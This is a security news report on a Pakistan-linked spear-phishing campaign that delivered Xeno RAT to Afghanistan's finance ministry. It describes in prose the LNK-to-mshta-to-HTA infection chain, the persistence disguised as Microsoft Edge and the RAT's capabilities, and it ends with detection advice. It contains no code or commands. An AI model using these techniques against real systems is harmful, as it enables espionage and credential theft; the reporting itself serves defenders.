SideCopy Uses Xeno RAT to Target Afghan Finance Ministry

Security researchers disclosed a Pakistan-linked campaign that used Pashto-language spear-phishing lures to deliver the open-source remote access trojan Xeno RAT to Afghanistan’s Ministry of Finance and multiple provincial finance and revenue directorates. The operation has been named Operation XENOFISCAL and is linked to the SideCopy cluster associated with the Transparent Tribe group, also tracked as APT36.

Seqrite Labs researcher Dixit Panchal described the initial delivery as a ZIP archive containing a Windows shortcut file (LNK) with a Pashto filename. When opened, the shortcut launches mshta.exe to download an HTML Application (HTA) from a compromised Afghan education domain. The HTA executes obfuscated JavaScript in memory as the next stage of the infection chain.

The staged payload uses a DLL-based loader to drop Xeno RAT version 1.8.7 and a decoy document. The loader creates Registry-based persistence that imitates Microsoft Edge and sets up a scheduled task to run the malware on a regular basis.

Xeno RAT establishes a TCP connection to a remote operator and can load external DLL modules. The implant supports file collection and exfiltration, execution of arbitrary commands, and management of persistence. Other capabilities observed include gathering antivirus information, creating SOCKS5 proxy tunnels for network pivoting, file operations, keystroke logging, taking screenshots, monitoring the clipboard, and accessing webcams and microphones. The malware can remove persistence entries and uninstall itself.

Researchers noted the use of Pashto in the lure files and the choice of targets as indicators that the operators were familiar with the local environment. The campaign focused on Pashto-speaking government officials and provincial employees in financial roles; observed objectives included obtaining credentials, accessing files and maintaining persistent access to compromised systems.

Seqrite Labs linked Operation XENOFISCAL to broader Transparent Tribe activity in the region. Earlier reports associated the group with attacks that used Xeno RAT, Spark RAT and CurlBack RAT against organizations in South Asia. A related campaign targeting Indian military infrastructure used weaponized Linux .desktop launcher files and WhatsApp-based social engineering to deliver a staged shell payload and a Golang-based ELF implant tracked as DeskRAT. Researcher R.D. Tarun wrote that the campaign appeared to target individuals connected to Indian military and defense infrastructure.

Seqrite Labs published technical indicators from the Afghan campaign, including the Pashto-named lure files, the HTA retrieval from the compromised domain, the mshta.exe invocation and the DLL loader behavior. Organizations handling financial or defense-related information in the region were advised to review email filtering rules, inspect archived attachments for LNK files, and monitor for unusual mshta.exe activity, scheduled tasks that mimic browsers, and unexpected outbound TCP connections consistent with remote access trojans.